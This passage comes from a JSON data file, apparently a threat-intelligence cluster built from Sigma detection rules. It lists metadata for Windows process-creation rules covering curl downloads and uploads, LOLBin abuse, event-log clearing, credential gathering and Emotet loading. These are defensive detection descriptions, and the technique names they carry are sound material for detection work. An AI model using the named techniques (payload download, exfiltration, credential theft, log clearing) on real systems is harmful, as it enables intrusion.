"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csexec.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2022/08/22", - "filename": "proc_creation_win_susp_csexec.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft \u201cRoslyn\u201d Community Technology Preview was named 'rcsi.exe'", - "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", - "value": "Suspicious Csi.exe Usage", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", - "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", - "https://twitter.com/Z3Jpa29z/status/1317545798981324801", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" - ], - "tags": [ - "attack.execution", - "attack.t1072", - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/17", - "filename": "proc_creation_win_susp_csi.yml", - "author": "Konstantin Grishchenko, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate usage by software developers" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", - "value": "Suspicious Curl Usage on Windows", - "meta": { - "refs": [ - "https://twitter.com/max_mal_/status/1542461200797163522", - "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", - "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", - "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2020/07/03", - "filename": "proc_creation_win_susp_curl_download.yml", - "author": "Florian Roth, Nasreddine Bencherchali (updated)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious curl process start the adds a file to a web request", - "uuid": "00bca14a-df4e-4649-9054-3f2aa676bc04", - "value": "Suspicious Curl File Upload", - "meta": { - "refs": [ - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", - "https://curl.se/docs/manpage.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" - ], - "creation_date": "2020/07/03", - "filename": "proc_creation_win_susp_curl_fileupload.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Scripts created by developers and admins" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "value": "Curl Start Combination", - "meta": { - "refs": [ - "https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_start_combo.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2020/01/13", - "filename": "proc_creation_win_susp_curl_start_combo.yml", - "author": "Sreeman, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrative scripts (installers)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious curl process start on Windows with set useragent options", - "uuid": "3286d37a-00fd-41c2-a624-a672dcd34e60", - "value": "Suspicious Curl Change User Agents", - "meta": { - "refs": [ - "https://curl.se/docs/manpage.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_useragent.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2022/01/23", - "filename": "proc_creation_win_susp_curl_useragent.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", - "uuid": "6345b048-8441-43a7-9bed-541133633d7a", - "value": "ZOHO Dctask64 Process Injection", - "meta": { - "refs": [ - "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095963789111296", - "https://twitter.com/gN3mes1s/status/1222095371175911424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ], - "creation_date": "2020/01/28", - "filename": "proc_creation_win_susp_dctask64_proc_inject.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown yet" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line to remove and 'exe' or 'dll'", - "uuid": "204b17ae-4007-471b-917b-b917b315c5db", - "value": "Suspicious Del in CommandLine", - "meta": { - "refs": [ - "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_del.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2021/12/02", - "filename": "proc_creation_win_susp_del.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "value": "Suspicious Desktopimgdownldr Command", - "meta": { - "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", - "https://twitter.com/SBousseaden/status/1278977301745741825", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2020/07/03", - "filename": "proc_creation_win_susp_desktopimgdownldr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "uuid": "90d50722-0483-4065-8e35-57efaadd354d", - "value": "DevInit Lolbin Download", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1460815932402679809", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/01/11", - "filename": "proc_creation_win_susp_devinit_lolbin.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The Devtoolslauncher.exe executes other binary", - "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "value": "Devtoolslauncher.exe Executes Specified Binary", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", - "https://twitter.com/_felamos/status/1179811992841797632", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2019/10/12", - "filename": "proc_creation_win_susp_devtoolslauncher.yml", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", - "level": "high", - "falsepositive": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", - "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", - "value": "Suspicious DIR Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dir.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1217" - ], - "creation_date": "2021/12/13", - "filename": "proc_creation_win_susp_dir.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", - "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", - "value": "Direct Autorun Keys Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/10/25", - "filename": "proc_creation_win_susp_direct_asep_reg_keys_modification.yml", - "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command that is used to disable or delete Windows eventlog via logman Windows utility", - "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", - "value": "Disable or Delete Windows Eventlog", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1359039665232306183?s=21", - "https://ss64.com/nt/logman.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" - ], - "creation_date": "2021/02/11", - "filename": "proc_creation_win_susp_disable_eventlog.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "uuid": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "value": "Disabled IE Security Features", - "meta": { - "refs": [ - "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/06/19", - "filename": "proc_creation_win_susp_disable_ie_features.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown, maybe some security software installer disables these features temporarily" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", - "uuid": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", - "value": "Raccine Uninstall", - "meta": { - "refs": [ - "https://github.com/Neo23x0/Raccine", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/01/21", - "filename": "proc_creation_win_susp_disable_raccine.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate deinstallation by administrative staff" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "value": "Execution via Diskshadow.exe", - "meta": { - "refs": [ - "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_diskshadow.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_susp_diskshadow.yml", - "author": "Ivan Dyachkov, oscd.community", - "level": "high", - "falsepositive": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups.", - "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", - "value": "DIT Snapshot Viewer Use", - "meta": { - "refs": [ - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://github.com/yosqueoy/ditsnap", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], - "creation_date": "2020/07/04", - "filename": "proc_creation_win_susp_ditsnap.yml", - "author": "Furkan Caliskan (@caliskanfurkan_)", - "level": "high", - "falsepositive": [ - "Legitimate admin usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a \"dllhost\" spawning with no commandline arguments which is a very rare thing to happen and could indicate process injection activity or malware mimicking similar system processes", - "uuid": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "value": "Dllhost Process With No CommandLine", - "meta": { - "refs": [ - "https://redcanary.com/blog/child-processes/", - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2022/06/27", - "filename": "proc_creation_win_susp_dllhost_no_cli.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execute C# code located in the consoleapp folder", - "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", - "value": "Application Whitelisting Bypass via Dnx.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", - "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dnx.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1027.004" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_susp_dnx.yml", - "author": "Beyu Denis, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate use of dnx.exe by legitimate user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "value": "Suspicious Double Extension", - "meta": { - "refs": [ - "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", - "https://twitter.com/blackorbird/status/1140519090961825792", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2019/06/26", - "filename": "proc_creation_win_susp_double_extension.yml", - "author": "Florian Roth (rule), @blu3_team (idea)", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "value": "Suspicious Download from Office Domain", - "meta": { - "refs": [ - "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", - "https://twitter.com/mrd0x/status/1475085452784844803?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" - ], - "tags": "No established tags", - "creation_date": "2021/12/27", - "filename": "proc_creation_win_susp_download_office_domain.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", - "value": "Suspicious Kernel Dump Using Dtrace", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1474899714290208777?s=12", - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml" - ], - "tags": "No established tags", - "creation_date": "2021/12/28", - "filename": "proc_creation_win_susp_dtrace_kernel_dump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", - "uuid": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", - "value": "Suspicious Electron Application Child Processes", - "meta": { - "refs": [ - "https://taggart-tech.com/quasar-electron/", - "https://github.com/mttaggart/quasar", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/10/21", - "filename": "proc_creation_win_susp_electron_app_children.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", - "value": "Emotet RunDLL32 Process Creation", - "meta": { - "refs": [ - "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", - "https://cyber.wtf/2021/11/15/guess-whos-back/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2020/12/25", - "filename": "proc_creation_win_susp_emotet_rundll32_execution.yml", - "author": "FPT.EagleEye", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", - "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", - "value": "Esentutl Gather Credentials", - "meta": { - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816", - "https://attack.mitre.org/software/S0404/", - "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.003" - ], - "creation_date": "2021/08/06", - "filename": "proc_creation_win_susp_esentutl_params.yml", - "author": "sam0x90", - "level": "medium", - "falsepositive": [ - "To be determined" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "value": "Suspicious Eventlog Clear or Configuration Using Wevtutil", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ], - "creation_date": "2019/09/26", - "filename": "proc_creation_win_susp_eventlog_clear.yml", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community", - "level": "high", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious execution from an uncommon folder", - "uuid": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", - "value": "Execution from Suspicious Folder", - "meta": { - "refs": [ - "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", - "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_execution_path.yml", - "author": "Florian Roth, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", - "uuid": "35efb964-e6a5-47ad-bbcd-19661854018d", - "value": "Execution in Webserver Root Folder", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_execution_path_webserver.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Various applications", - "Tools that include ping or nslookup command invocations" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Attackers can use explorer.exe for evading defense mechanisms", - "uuid": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", - "value": "Proxy Execution Via Explorer.exe", - "meta": { - "refs": [ - "https://twitter.com/CyberRaiju/status/1273597319322058752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_susp_explorer.yml", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", - "level": "low", - "falsepositive": [ - "Legitimate explorer.exe run from cmd.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", - "uuid": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", - "value": "Explorer Process Tree Break", - "meta": { - "refs": [ - "https://twitter.com/CyberRaiju/status/1273597319322058752", - "https://twitter.com/bohops/status/1276357235954909188?s=12", - "https://twitter.com/nas_bench/status/1535322450858233858", - "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2019/06/29", - "filename": "proc_creation_win_susp_explorer_break_proctree.yml", - "author": "Florian Roth, Nasreddine Bencherchali, @gott_cyber", - "level": "medium", - "falsepositive": [ - "Unknown how many legitimate software products use that method" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", - "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", - "value": "Explorer NOUACCHECK Flag", - "meta": { - "refs": [ - "https://twitter.com/ORCA6665/status/1496478087244095491", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2022/02/23", - "filename": "proc_creation_win_susp_explorer_nouaccheck.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", - "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", - "value": "Suspicious File Characteristics Due to Missing Fields", - "meta": { - "refs": [ - "https://securelist.com/muddywater/88059/", - "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.006" - ], - "creation_date": "2018/11/22", - "filename": "proc_creation_win_susp_file_characteristics.yml", - "author": "Markus Neis, Sander Wiebing", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", - "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", - "value": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/GfxDownloadWrapper/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml", - "author": "Victor Sergeev, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).", - "uuid": "37db85d1-b089-490a-a59a-c7b6f984f480", - "value": "Suspicious Findstr 385201 Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_385201.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ], - "creation_date": "2021/12/16", - "filename": "proc_creation_win_susp_findstr_385201.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", - "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", - "value": "Findstr Launching .lnk File", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_lnk.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1202", - "attack.t1027.003" - ], - "creation_date": "2020/05/01", - "filename": "proc_creation_win_susp_findstr_lnk.yml", - "author": "Trent Liffick", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", - "value": "Finger.exe Suspicious Invocation", - "meta": { - "refs": [ - 